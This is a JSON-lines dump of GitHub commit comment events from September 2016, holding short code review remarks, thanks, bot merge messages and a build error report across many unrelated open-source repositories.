{"id":"4540335277","type":"CommitCommentEvent","actor":{"login":"XueMingXiao"},"repo":{"name":"XueMingXiao/Saliency"},"payload":{"comment":{"id":18963726,"position":4,"line":4,"path":"README.md","commit_id":"ab0c0b26846fb3878d638b9b7bd1d9d0d77d5e8e","created_at":"2016-09-09T14:21:50Z","updated_at":"2016-09-09T14:21:50Z","body":"--------------------------------"}},"created_at":"2016-09-09T14:21:50Z"}
{"id":"4540335818","type":"CommitCommentEvent","actor":{"login":"XueMingXiao"},"repo":{"name":"XueMingXiao/Saliency"},"payload":{"comment":{"id":18963729,"position":4,"line":4,"path":"README.md","commit_id":"ab0c0b26846fb3878d638b9b7bd1d9d0d77d5e8e","created_at":"2016-09-09T14:21:56Z","updated_at":"2016-09-09T14:21:56Z","body":"---------------------------------"}},"created_at":"2016-09-09T14:21:56Z"}
{"id":"4540336427","type":"CommitCommentEvent","actor":{"login":"XueMingXiao"},"repo":{"name":"XueMingXiao/Saliency"},"payload":{"comment":{"id":18963730,"position":4,"line":4,"path":"README.md","commit_id":"ab0c0b26846fb3878d638b9b7bd1d9d0d77d5e8e","created_at":"2016-09-09T14:22:00Z","updated_at":"2016-09-09T14:22:00Z","body":"------------------------"}},"created_at":"2016-09-09T14:22:00Z"}
{"id":"4540336824","type":"CommitCommentEvent","actor":{"login":"XueMingXiao"},"repo":{"name":"XueMingXiao/Saliency"},"payload":{"comment":{"id":18963733,"position":4,"line":4,"path":"README.md","commit_id":"ab0c0b26846fb3878d638b9b7bd1d9d0d77d5e8e","created_at":"2016-09-09T14:22:04Z","updated_at":"2016-09-09T14:22:04Z","body":"----------------------"}},"created_at":"2016-09-09T14:22:04Z"}
{"id":"4540337235","type":"CommitCommentEvent","actor":{"login":"XueMingXiao"},"repo":{"name":"XueMingXiao/Saliency"},"payload":{"comment":{"id":18963736,"position":4,"line":4,"path":"README.md","commit_id":"ab0c0b26846fb3878d638b9b7bd1d9d0d77d5e8e","created_at":"2016-09-09T14:22:11Z","updated_at":"2016-09-09T14:22:11Z","body":"----------------------"}},"created_at":"2016-09-09T14:22:11Z"}
{"id":"4540339959","type":"CommitCommentEvent","actor":{"login":"ffont"},"repo":{"name":"ffont/freesound-explorer"},"payload":{"comment":{"id":18963746,"position":5,"line":50,"path":"static/src/actions/midi.js","commit_id":"6ce1a816afee3fefe18f7dcad948b7d8314e5d00","created_at":"2016-09-09T14:22:38Z","updated_at":"2016-09-09T14:22:38Z","body":"Done!"}},"created_at":"2016-09-09T14:22:38Z"}
{"id":"4540347362","type":"CommitCommentEvent","actor":{"login":"daironmichel"},"repo":{"name":"graphql-python/graphene"},"payload":{"comment":{"id":18963761,"position":null,"line":null,"path":null,"commit_id":"907b34676d43c121d6ccf3e5c32280fd62ce9aa9","created_at":"2016-09-09T14:23:55Z","updated_at":"2016-09-09T14:23:55Z","body":"Good job! @syrusakbary Thanks!"}},"created_at":"2016-09-09T14:23:55Z"}
{"id":"4540350969","type":"CommitCommentEvent","actor":{"login":"takhlaq"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":18963771,"position":26,"line":332,"path":"src/map/enmity_container.cpp","commit_id":"9dfcfe81110648161481af1d29ded3d736c77301","created_at":"2016-09-09T14:24:30Z","updated_at":"2016-09-09T14:24:30Z","body":"no the owner of the enmity container is m_EnmityHolder for whatever reason"}},"created_at":"2016-09-09T14:24:30Z"}
{"id":"4540353806","type":"CommitCommentEvent","actor":{"login":"wesllenalves"},"repo":{"name":"wesllenalves/curso-php"},"payload":{"comment":{"id":18963779,"position":null,"line":null,"path":null,"commit_id":"59398305b87c4721721307a7a0ba40b8666cc126","created_at":"2016-09-09T14:24:59Z","updated_at":"2016-09-09T14:24:59Z","body":"Eu wesllen fiz esse codigo"}},"created_at":"2016-09-09T14:24:59Z"}
{"id":"4540355860","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"classicdb/database"},"payload":{"comment":{"id":18963787,"position":null,"line":null,"path":null,"commit_id":"9ad062499da2e91dfc7b8d05855ea099bbacdf7e","created_at":"2016-09-09T14:25:20Z","updated_at":"2016-09-09T14:25:20Z","body":"My apologies to all people having a local copy of this repository: I had to rebase it so chances are very high that you history is now screwed. Sorry about that, I would have prevented it if I had another choice.\r\n\r\nSo, the best way is to clone it anew (don't forget to save or move apart in a safe place your local changes before doing this)."}},"created_at":"2016-09-09T14:25:20Z"}
{"id":"4540357921","type":"CommitCommentEvent","actor":{"login":"Bliinky"},"repo":{"name":"team-thirtyfour/js13kgame"},"payload":{"comment":{"id":18963791,"position":28,"line":74,"path":"src/Collision.js","commit_id":"319cbce339f04756b93e97cfe4f06053814e9b39","created_at":"2016-09-09T14:25:40Z","updated_at":"2016-09-09T14:25:40Z","body":"width ... oué pas widht "}},"created_at":"2016-09-09T14:25:40Z"}
{"id":"4540359039","type":"CommitCommentEvent","actor":{"login":"schas002"},"repo":{"name":"LogicodeLang/Logicode"},"payload":{"comment":{"id":18963796,"position":7,"line":7,"path":"syntax/lgc.vim","commit_id":"c061eacce156635b77da30b4a37e58b8b56eb5c8","created_at":"2016-09-09T14:25:51Z","updated_at":"2016-09-09T14:25:51Z","body":"Steps 2-5 are optional, if you want Vim to recognize Logicode files automatically. You can just `:set syntax=lgc` to set it manually."}},"created_at":"2016-09-09T14:25:51Z"}
{"id":"4540361929","type":"CommitCommentEvent","actor":{"login":"takhlaq"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":18963802,"position":null,"line":null,"path":null,"commit_id":"9dfcfe81110648161481af1d29ded3d736c77301","created_at":"2016-09-09T14:26:20Z","updated_at":"2016-09-09T14:26:20Z","body":"> there are redundant hipclvl writes now (TakePhysicalDamage, for one).\r\n\r\nthey were already redundant since those functions called UpdateEnmity which did the exact same thing anyways"}},"created_at":"2016-09-09T14:26:20Z"}
{"id":"4540363535","type":"CommitCommentEvent","actor":{"login":"vitalets"},"repo":{"name":"mmotkina/mocha-parallel-tests"},"payload":{"comment":{"id":18963804,"position":null,"line":null,"path":null,"commit_id":"c9b89b89bfd7cc771918b18b693aa1b2a226af89","created_at":"2016-09-09T14:26:33Z","updated_at":"2016-09-09T14:26:33Z","body":"wow, great! 👍 "}},"created_at":"2016-09-09T14:26:33Z"}
{"id":"4540364318","type":"CommitCommentEvent","actor":{"login":"ThomasR"},"repo":{"name":"JetBrains/intellij-community"},"payload":{"comment":{"id":18963808,"position":32,"line":722,"path":"platform/platform-impl/src/com/intellij/openapi/fileEditor/impl/FileEditorManagerImpl.java","commit_id":"e3250816e0faea20b3f09dc5018693a14a4593eb","created_at":"2016-09-09T14:26:40Z","updated_at":"2016-09-09T14:26:40Z","body":"This also fixes IDEA-119149 :)"}},"created_at":"2016-09-09T14:26:40Z"}
{"id":"4540369238","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18963820,"position":null,"line":null,"path":null,"commit_id":"95dd0d0738e4679039830843f653eab68f9c855e","created_at":"2016-09-09T14:27:26Z","updated_at":"2016-09-09T14:27:26Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Izqak2ixRHGmYQ2UWDKYgw"}},"created_at":"2016-09-09T14:27:26Z"}
{"id":"4540372085","type":"CommitCommentEvent","actor":{"login":"morlovich"},"repo":{"name":"pagespeed/ngx_pagespeed"},"payload":{"comment":{"id":18963826,"position":null,"line":null,"path":null,"commit_id":"269ed10ed56230d7b83bdb81e6b7cc1deaf3227f","created_at":"2016-09-09T14:27:53Z","updated_at":"2016-09-09T14:27:53Z","body":"FWIW: this was committed a week ago"}},"created_at":"2016-09-09T14:27:53Z"}
{"id":"4540373591","type":"CommitCommentEvent","actor":{"login":"mcg1969"},"repo":{"name":"Azure/azure-data-lake-store-python"},"payload":{"comment":{"id":18963834,"position":7,"line":50,"path":"adlfs/cli.py","commit_id":"eed2c47e537f8eaadb5c6ffcfc89ad703ac22fb0","created_at":"2016-09-09T14:28:09Z","updated_at":"2016-09-09T14:28:09Z","body":"I agree re: recursion. I'd rather see a while loop here. I can't speak to the other matter."}},"created_at":"2016-09-09T14:28:09Z"}
{"id":"4540374017","type":"CommitCommentEvent","actor":{"login":"nizamcse"},"repo":{"name":"technext/Lazyfox"},"payload":{"comment":{"id":18963836,"position":null,"line":null,"path":null,"commit_id":"9a4464238a5cf945490fe1552e9be37800f15d1a","created_at":"2016-09-09T14:28:13Z","updated_at":"2016-09-09T14:28:13Z","body":"rtyrtyrty"}},"created_at":"2016-09-09T14:28:13Z"}
{"id":"4540374028","type":"CommitCommentEvent","actor":{"login":"rs2"},"repo":{"name":"bcj/AttrDict"},"payload":{"comment":{"id":18963837,"position":84,"line":81,"path":"README.rst","commit_id":"bd4d3d100ce1e2a605c32bb8af7da44048652334","created_at":"2016-09-09T14:28:14Z","updated_at":"2016-09-09T14:28:14Z","body":"Missing underscore."}},"created_at":"2016-09-09T14:28:14Z"}
{"id":"4540376120","type":"CommitCommentEvent","actor":{"login":"hcdychen"},"repo":{"name":"hcdychen/springmvc"},"payload":{"comment":{"id":18963839,"position":null,"line":null,"path":null,"commit_id":"4c7a674942d28d72213e32c88449dba7ce9ee805","created_at":"2016-09-09T14:28:34Z","updated_at":"2016-09-09T14:28:34Z","body":"数据库文件"}},"created_at":"2016-09-09T14:28:34Z"}
{"id":"4540378060","type":"CommitCommentEvent","actor":{"login":"rnorth"},"repo":{"name":"testcontainers/testcontainers-java"},"payload":{"comment":{"id":18963841,"position":null,"line":null,"path":null,"commit_id":"7ec514f3f20afde79a64f62d0187a623121df728","created_at":"2016-09-09T14:28:53Z","updated_at":"2016-09-09T14:28:53Z","body":":) Thanks!\r\n\r\nThe CHANGELOG generally tracks important changes: https://github.com/testcontainers/testcontainers-java/blob/master/CHANGELOG.md\r\n\r\nShould be up to date for 1.1.5!"}},"created_at":"2016-09-09T14:28:53Z"}
{"id":"4540378393","type":"CommitCommentEvent","actor":{"login":"Bottlezn"},"repo":{"name":"Bottlezn/GradientView"},"payload":{"comment":{"id":18963843,"position":null,"line":null,"path":null,"commit_id":"c0836d691305dd193e9fbf4d4864b11d5e9414f1","created_at":"2016-09-09T14:28:56Z","updated_at":"2016-09-09T14:28:56Z","body":"增加一个README文件"}},"created_at":"2016-09-09T14:28:56Z"}
{"id":"4540387292","type":"CommitCommentEvent","actor":{"login":"ooghry"},"repo":{"name":"phpmyadmin/phpmyadmin"},"payload":{"comment":{"id":18963871,"position":null,"line":null,"path":null,"commit_id":"9c1cfc855318d12f7c0a1c4fbe8f35564aa72769","created_at":"2016-09-09T14:30:26Z","updated_at":"2016-09-09T14:30:26Z","body":"I think this commit has bad effect on method authCheck of AuthenticationConfig.\r\n`    public function authCheck()\r\n    {\r\n        if ($GLOBALS['token_provided'] && $GLOBALS['token_mismatch']) {\r\n            return false;\r\n        }\r\n\r\n        return true;\r\n    }`"}},"created_at":"2016-09-09T14:30:26Z"}
{"id":"4540392700","type":"CommitCommentEvent","actor":{"login":"Pranoydll"},"repo":{"name":"Bubadabado/Fowler-Tech-Club-Web-Site"},"payload":{"comment":{"id":18963883,"position":null,"line":null,"path":null,"commit_id":"cb195b0a7211c42e6d770ff0a74817515a4e9321","created_at":"2016-09-09T14:31:20Z","updated_at":"2016-09-09T14:31:20Z","body":"No!! This is problem is already solved! What are you doing??!"}},"created_at":"2016-09-09T14:31:20Z"}
{"id":"4540397108","type":"CommitCommentEvent","actor":{"login":"fidian"},"repo":{"name":"tests-always-included/jasmine-node-helpers"},"payload":{"comment":{"id":18963887,"position":null,"line":null,"path":null,"commit_id":"7c5a57467d4d494f31eeff9a30d56aaaee675025","created_at":"2016-09-09T14:32:04Z","updated_at":"2016-09-09T14:32:04Z","body":"I think I'd prefer the project name to change instead."}},"created_at":"2016-09-09T14:32:04Z"}
{"id":"4540401293","type":"CommitCommentEvent","actor":{"login":"jasongilanfarr"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":18963912,"position":21,"line":53,"path":"docs/docs/rest-api/public/api/v2/types/mesosContainer.raml","commit_id":"beae72e92b14e2b15406cac9db77170abbc93ba2","created_at":"2016-09-09T14:32:48Z","updated_at":"2016-09-09T14:32:48Z","body":"Add default?"}},"created_at":"2016-09-09T14:32:48Z"}
{"id":"4540403054","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"schonmann/EDL"},"payload":{"comment":{"id":18963917,"position":null,"line":null,"path":null,"commit_id":"588cab99cb340970e528b4c373457eda48893c05","created_at":"2016-09-09T14:33:06Z","updated_at":"2016-09-09T14:33:06Z","body":"funcionou. até mostrei hoje na aula..."}},"created_at":"2016-09-09T14:33:06Z"}
{"id":"4540403300","type":"CommitCommentEvent","actor":{"login":"code-bot"},"repo":{"name":"code-bot/CS2340M2"},"payload":{"comment":{"id":18963918,"position":null,"line":null,"path":null,"commit_id":"9aca0b92729f4da3e2631d300b926c384ee7409c","created_at":"2016-09-09T14:33:09Z","updated_at":"2016-09-09T14:33:09Z","body":"There are 0 changes, because I initially had a build file that contained my gtid, which is sensitive information that I had to delete from all versions."}},"created_at":"2016-09-09T14:33:09Z"}
{"id":"4540404102","type":"CommitCommentEvent","actor":{"login":"TheLarkInn"},"repo":{"name":"webpack/webpack.js.org"},"payload":{"comment":{"id":18963923,"position":null,"line":null,"path":null,"commit_id":"dd668f5140b11d49d75d7975fa1c7901d0c41c44","created_at":"2016-09-09T14:33:17Z","updated_at":"2016-09-09T14:33:17Z","body":"Ahh I'm sorry! This was my fault. We should write some tests to prevent that lang type in the markdownlint"}},"created_at":"2016-09-09T14:33:17Z"}
{"id":"4540407176","type":"CommitCommentEvent","actor":{"login":"code-bot"},"repo":{"name":"code-bot/CS2340M2"},"payload":{"comment":{"id":18963931,"position":null,"line":null,"path":null,"commit_id":"2be16442ae964035a8fda1b491a86450f02b6db8","created_at":"2016-09-09T14:33:51Z","updated_at":"2016-09-09T14:33:51Z","body":"Instead of renaming my build file, this is actually where I created my new build file with the correct name instead of the gtid that starts with \"9030\""}},"created_at":"2016-09-09T14:33:51Z"}
{"id":"4540407302","type":"CommitCommentEvent","actor":{"login":"jasongilanfarr"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":18963932,"position":37,"line":92,"path":"docs/docs/rest-api/public/api/v2/types/mesosContainer.raml","commit_id":"beae72e92b14e2b15406cac9db77170abbc93ba2","created_at":"2016-09-09T14:33:52Z","updated_at":"2016-09-09T14:33:52Z","body":"I feel like we're not realistically going to add more lifecycle stuff to v2- maybe just embed the field? I'd love to have some magical way of defaulting objects :/"}},"created_at":"2016-09-09T14:33:52Z"}
{"id":"4540409038","type":"CommitCommentEvent","actor":{"login":"chulinyin"},"repo":{"name":"chulinyin/resume"},"payload":{"comment":{"id":18963934,"position":null,"line":null,"path":null,"commit_id":"4d9bfb3b385ebeb197269538b1a70e5fd8a70697","created_at":"2016-09-09T14:34:10Z","updated_at":"2016-09-09T14:34:10Z","body":"+## [Demo](chulinyin/resume.com)\r\n +\r\n +## What is it\r\n +It is  a resume  which is created by vue and webpack. And its content can be changed by edit the file of resumeData.json.\r\n +\r\n +## How to use it?\r\n +1. Fork it to your own github.\r\n +2. Clone it to your local folder.\r\n +3. Download NodeJS.\r\n +4. Run `npm install`.\r\n +5. Edit the `resumeDate.json` in the root direction.\r\n +6. Run 'webpack -p'\r\n +7. Push it to the remote depository by running `git push`\r\n +8. Done! \r\n +9. Now you can set depository by 'settingsGitHub Pages -> source -> master branch`, and then you can see your resume in the website `yourGithubName.github.io/resume`.\r\n +"}},"created_at":"2016-09-09T14:34:10Z"}
{"id":"4540409297","type":"CommitCommentEvent","actor":{"login":"code-bot"},"repo":{"name":"code-bot/CS2340M2"},"payload":{"comment":{"id":18963935,"position":null,"line":null,"path":null,"commit_id":"089e458dce2ef06593c2909c4d789fabdbbbe6b8","created_at":"2016-09-09T14:34:12Z","updated_at":"2016-09-09T14:34:12Z","body":"The gradle folder itself wasn't actually deleted, just the contents."}},"created_at":"2016-09-09T14:34:12Z"}
{"id":"4540411623","type":"CommitCommentEvent","actor":{"login":"gares"},"repo":{"name":"erikmd/ssr-under-tac"},"payload":{"comment":{"id":18963943,"position":209,"line":130,"path":"src/under.v","commit_id":"29349aaf60a511b2b526f6a48b8bdda38b076247","created_at":"2016-09-09T14:34:35Z","updated_at":"2016-09-09T14:34:35Z","body":"@erikmd Erik, can you explain why top' and lhs' have to be unified by hand here?  If I understand it correctly, rewrite [top]equ does it too.  @barbichu also interested."}},"created_at":"2016-09-09T14:34:35Z"}
{"id":"4540417146","type":"CommitCommentEvent","actor":{"login":"code-bot"},"repo":{"name":"code-bot/CS2340M2"},"payload":{"comment":{"id":18963955,"position":null,"line":null,"path":null,"commit_id":"bff564598794be3db0446ab0307dc65fa808a70a","created_at":"2016-09-09T14:35:33Z","updated_at":"2016-09-09T14:35:33Z","body":"Again, there are 0 changes since this is the commit that I used to delete my build file with the name \"9030...\" so that my sensitive information is not public. Thus this, commit deleted that file from all versions."}},"created_at":"2016-09-09T14:35:33Z"}
{"id":"4540417165","type":"CommitCommentEvent","actor":{"login":"studio6thave"},"repo":{"name":"nss-day-cohort-15/mastery-exercise-modern-javascript-ewilliamswtn"},"payload":{"comment":{"id":18963956,"position":5,"line":5,"path":"Gruntfile.js","commit_id":"f126d0ca7f8428aee94140c3610f13c4bbe806fc","created_at":"2016-09-09T14:35:33Z","updated_at":"2016-09-09T14:35:33Z","body":"This should reflect your javascript files:\r\n\r\n files: ['*.js'],"}},"created_at":"2016-09-09T14:35:33Z"}
{"id":"4540421839","type":"CommitCommentEvent","actor":{"login":"koola"},"repo":{"name":"wswebcreation/pix-diff"},"payload":{"comment":{"id":18963968,"position":50,"line":75,"path":"index.js","commit_id":"661f9663b4680ddbd16ed6234c6211a919810044","created_at":"2016-09-09T14:36:24Z","updated_at":"2016-09-09T14:36:24Z","body":"See commit baac6ad4aef166a4b577e3cb6193d37cd25fb45a can remove this line"}},"created_at":"2016-09-09T14:36:24Z"}
{"id":"4540422475","type":"CommitCommentEvent","actor":{"login":"code-bot"},"repo":{"name":"code-bot/CS2340M2"},"payload":{"comment":{"id":18963969,"position":null,"line":null,"path":null,"commit_id":"e6295c2d95293686f0e794d28df97e1ea327fb8e","created_at":"2016-09-09T14:36:30Z","updated_at":"2016-09-09T14:36:30Z","body":"Had to re-delete the folder after making changes to delete the build file from all versions."}},"created_at":"2016-09-09T14:36:30Z"}
{"id":"4540424580","type":"CommitCommentEvent","actor":{"login":"typedefstructer"},"repo":{"name":"andres-terabit/react-tinymce"},"payload":{"comment":{"id":18963976,"position":null,"line":null,"path":null,"commit_id":"c5dba33a1b51824e6040fb83cf824cd1d4f74f68","created_at":"2016-09-09T14:36:53Z","updated_at":"2016-09-09T14:36:53Z","body":"when will this be merged>?\r\n"}},"created_at":"2016-09-09T14:36:53Z"}
{"id":"4540432738","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18963994,"position":null,"line":null,"path":null,"commit_id":"351112b245ece9224a6871a5d6b886eef1c320aa","created_at":"2016-09-09T14:38:19Z","updated_at":"2016-09-09T14:38:19Z","body":"saw approval from bsparrow435\nat https://github.com/basho/riak_kv/commit/351112b245ece9224a6871a5d6b886eef1c320aa"}},"created_at":"2016-09-09T14:38:19Z"}
{"id":"4540432798","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18963996,"position":null,"line":null,"path":null,"commit_id":"351112b245ece9224a6871a5d6b886eef1c320aa","created_at":"2016-09-09T14:38:19Z","updated_at":"2016-09-09T14:38:19Z","body":"merging basho/riak_kv/nem-handle-undefined-fsm-limit = 351112b2 into borshop-integration-1475-nem-handle-undefined-fsm-limit"}},"created_at":"2016-09-09T14:38:19Z"}
{"id":"4540432856","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18963997,"position":null,"line":null,"path":null,"commit_id":"351112b245ece9224a6871a5d6b886eef1c320aa","created_at":"2016-09-09T14:38:20Z","updated_at":"2016-09-09T14:38:20Z","body":"basho/riak_kv/nem-handle-undefined-fsm-limit = 351112b2 merged ok, testing candidate = 98785981"}},"created_at":"2016-09-09T14:38:20Z"}
{"id":"4540434632","type":"CommitCommentEvent","actor":{"login":"typedefstructer"},"repo":{"name":"andres-terabit/react-tinymce"},"payload":{"comment":{"id":18964002,"position":null,"line":null,"path":null,"commit_id":"c5dba33a1b51824e6040fb83cf824cd1d4f74f68","created_at":"2016-09-09T14:38:39Z","updated_at":"2016-09-09T14:38:39Z","body":"or if its not happening anytime soon, any other way to fix this, adding 'key' to parent working re-renders compontent but the editor also looses focus.\r\n\r\nplease suggest someother way to fix this"}},"created_at":"2016-09-09T14:38:39Z"}
{"id":"4540436513","type":"CommitCommentEvent","actor":{"login":"joshuaruesweg"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":18964004,"position":null,"line":null,"path":null,"commit_id":"e1a048dfd5b0e962397881fcbe2859a332cdfcd1","created_at":"2016-09-09T14:38:57Z","updated_at":"2016-09-09T14:38:57Z","body":"Thanks 👍 "}},"created_at":"2016-09-09T14:38:57Z"}
{"id":"4540439294","type":"CommitCommentEvent","actor":{"login":"koola"},"repo":{"name":"wswebcreation/pix-diff"},"payload":{"comment":{"id":18964011,"position":53,"line":78,"path":"index.js","commit_id":"661f9663b4680ddbd16ed6234c6211a919810044","created_at":"2016-09-09T14:39:27Z","updated_at":"2016-09-09T14:39:27Z","body":"This needs moving into the previous function, like:\r\n```\r\n.then(function (ratio) {\r\n    this.devicePixelRatio = ratio;\r\n    return this.getBrowserDimensions();\r\n}.bind(this))\r\n```"}},"created_at":"2016-09-09T14:39:27Z"}
{"id":"4540444495","type":"CommitCommentEvent","actor":{"login":"ATenderholt"},"repo":{"name":"ATenderholt/cclib"},"payload":{"comment":{"id":18964022,"position":35,"line":200,"path":"src/cclib/parser/logfileparser.py","commit_id":"59453355360e3a682f10160778507cfdbfe646a3","created_at":"2016-09-09T14:40:23Z","updated_at":"2016-09-09T14:40:23Z","body":"This needs to be moved into the if-statement below."}},"created_at":"2016-09-09T14:40:23Z"}
{"id":"4540451804","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18964039,"position":null,"line":null,"path":null,"commit_id":"0d66fd8f82fdbcb7c1e80e1f6c76ec712d2506e3","created_at":"2016-09-09T14:41:40Z","updated_at":"2016-09-09T14:41:40Z","body":"Also see [Issue 256: error: requested alignment is less than minimum alignment of 16 for type 'unsigned __int128 [8]'](http://github.com/weidai11/cryptopp/issues/256)."}},"created_at":"2016-09-09T14:41:40Z"}
{"id":"4540453301","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon-sdk"},"payload":{"comment":{"id":18964045,"position":5,"line":32,"path":"source/ceylon/collection/Cell.ceylon","commit_id":"e30b23ea918e7379043f64ae08d1244e3e1f91c3","created_at":"2016-09-09T14:41:57Z","updated_at":"2016-09-09T14:41:57Z","body":"Indeed it broke `HashMap` and I already reverted it."}},"created_at":"2016-09-09T14:41:57Z"}
{"id":"4540454993","type":"CommitCommentEvent","actor":{"login":"koola"},"repo":{"name":"wswebcreation/pix-diff"},"payload":{"comment":{"id":18964049,"position":69,"line":125,"path":"index.js","commit_id":"661f9663b4680ddbd16ed6234c6211a919810044","created_at":"2016-09-09T14:42:15Z","updated_at":"2016-09-09T14:42:15Z","body":"Can camelCase take care of this?"}},"created_at":"2016-09-09T14:42:15Z"}
{"id":"4540458551","type":"CommitCommentEvent","actor":{"login":"hiili"},"repo":{"name":"torch/torch7"},"payload":{"comment":{"id":18964056,"position":null,"line":null,"path":null,"commit_id":"df191583ab794dd8e82a101f1d17436902ee5152","created_at":"2016-09-09T14:42:50Z","updated_at":"2016-09-09T14:42:50Z","body":"This commit seems to break building on Windows, at least when using Visual Studio 64-bit toolchain (build process as in wiki > Windows, see also https://github.com/torch/torch7/pull/287).\r\n\r\nStill broken at head (<https://github.com/torch/torch7/commit/e5ebac6a3d6b14382e4641a8701f23b57e7d6e30>).\r\n\r\nError message:\r\n\r\n    [ 42%] Building C object lib/TH/CMakeFiles/TH.dir/THVector.c.obj\r\n    THVector.c\r\n    x:\\temp\\foo2\\torch7\\lib\\th\\generic/simd/simd.h(60): error C2065: 'asm': undeclared identifier\r\n    x:\\temp\\foo2\\torch7\\lib\\th\\generic/simd/simd.h(60): error C2143: syntax error: missing ';' before 'volatile'\r\n    x:\\temp\\foo2\\torch7\\lib\\th\\vector/SSE.c(1): fatal error C1083: Cannot open include file: 'x86intrin.h': No such file or directory\r\n    NMAKE : fatal error U1077: 'C:\\PROGRA~2\\MICROS~2.0\\VC\\bin\\amd64\\cl.exe' : return code '0x2'\r\n    Stop.\r\n    NMAKE : fatal error U1077: '\"C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\BIN\\amd64\\nmake.exe\"' : return code '0x2'\r\n    Stop.\r\n    NMAKE : fatal error U1077: '\"C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\BIN\\amd64\\nmake.exe\"' : return code '0x2'\r\n    Stop.\r\n    \r\n    Error: Build error: Failed building.\r\n\r\nps. I understand that Windows is not officially supported, just letting you know about this!"}},"created_at":"2016-09-09T14:42:50Z"}
{"id":"4540461428","type":"CommitCommentEvent","actor":{"login":"elvisciotti"},"repo":{"name":"ministryofjustice/opg-digi-deps-client"},"payload":{"comment":{"id":18964065,"position":null,"line":null,"path":null,"commit_id":"f264fb5e49e08954f807e2efa37bb2e2cc032d61","created_at":"2016-09-09T14:43:21Z","updated_at":"2016-09-09T14:43:21Z","body":"should be DDPB-376"}},"created_at":"2016-09-09T14:43:21Z"}
{"id":"4540462000","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18964068,"position":5,"line":88,"path":"language/src/ceylon/language/Object.ceylon","commit_id":"83d6a60d9f078187670f4dd812ecce53d046c99a","created_at":"2016-09-09T14:43:27Z","updated_at":"2016-09-09T14:43:27Z","body":"The exact method used to do truncation to 32 bits is not specified. All `small` means is \"this value can be represented in 32 bits\". Which is patently true in this case. So I really don't see what you're worried about."}},"created_at":"2016-09-09T14:43:27Z"}
{"id":"4540465513","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18964079,"position":null,"line":null,"path":null,"commit_id":"fda2b63ad8e866432f6554e5be104f9297726132","created_at":"2016-09-09T14:44:05Z","updated_at":"2016-09-09T14:44:05Z","body":":+1:\r\nI didn't know flushing the Doctrine objects could have this type of impact. Will try to use that more, then. This might help in the migration process as well."}},"created_at":"2016-09-09T14:44:05Z"}
{"id":"4540466537","type":"CommitCommentEvent","actor":{"login":"attack11"},"repo":{"name":"sagar846/android_kernel_motorola_msm8226"},"payload":{"comment":{"id":18964081,"position":4,"line":138,"path":"drivers/cpufreq/cpufreq_interactive.c","commit_id":"95eb91fdf1d054239052842d4f7a16a05ccb9d1f","created_at":"2016-09-09T14:44:17Z","updated_at":"2016-09-09T14:44:17Z","body":"This shouldnt be deleted"}},"created_at":"2016-09-09T14:44:17Z"}
{"id":"4540471347","type":"CommitCommentEvent","actor":{"login":"wildefyr"},"repo":{"name":"wildefyr/mpvc"},"payload":{"comment":{"id":18964094,"position":null,"line":null,"path":null,"commit_id":"e54969b7bceb9e5d42e6a8269801364af5888dbc","created_at":"2016-09-09T14:45:09Z","updated_at":"2016-09-09T14:45:09Z","body":"Thanks. I really need to actually watch my own repositories it seems!"}},"created_at":"2016-09-09T14:45:09Z"}
{"id":"4540471545","type":"CommitCommentEvent","actor":{"login":"studio6thave"},"repo":{"name":"nss-day-cohort-15/mastery-exercise-modern-javascript-ewilliamswtn"},"payload":{"comment":{"id":18964096,"position":14,"line":14,"path":"Gruntfile.js","commit_id":"f126d0ca7f8428aee94140c3610f13c4bbe806fc","created_at":"2016-09-09T14:45:12Z","updated_at":"2016-09-09T14:45:12Z","body":"This should reflect only your current project files:\r\nfiles: ['*.js']"}},"created_at":"2016-09-09T14:45:12Z"}
{"id":"4540475180","type":"CommitCommentEvent","actor":{"login":"c-bik"},"repo":{"name":"K2InformaticsGmbH/dderl"},"payload":{"comment":{"id":18964105,"position":3,"line":191,"path":"src/dderl.hrl","commit_id":"9791e94455f3cedc1d8dc1e93ae66d325e40587a","created_at":"2016-09-09T14:45:46Z","updated_at":"2016-09-09T14:45:46Z","body":"is this still used?"}},"created_at":"2016-09-09T14:45:46Z"}
{"id":"4540478447","type":"CommitCommentEvent","actor":{"login":"Merdoc97"},"repo":{"name":"Merdoc97/ShoeMarket"},"payload":{"comment":{"id":18964114,"position":19,"line":19,"path":"pom.xml","commit_id":"e0ded36a36f5044de8f563dd6ec979875bcf86ff","created_at":"2016-09-09T14:46:20Z","updated_at":"2016-09-09T14:46:20Z","body":"delete"}},"created_at":"2016-09-09T14:46:20Z"}
{"id":"4540479230","type":"CommitCommentEvent","actor":{"login":"linas"},"repo":{"name":"linuxmint/systemd-betsy"},"payload":{"comment":{"id":18964117,"position":null,"line":null,"path":null,"commit_id":"f7ab85f1e1169ac1598dfc1fba1c01063840b3c5","created_at":"2016-09-09T14:46:27Z","updated_at":"2016-09-09T14:46:27Z","body":"It is claimed that this patch fixes mate-desktop/mate-settings-daemon#44 and many other similar bugs mentioned in that bug report!"}},"created_at":"2016-09-09T14:46:27Z"}
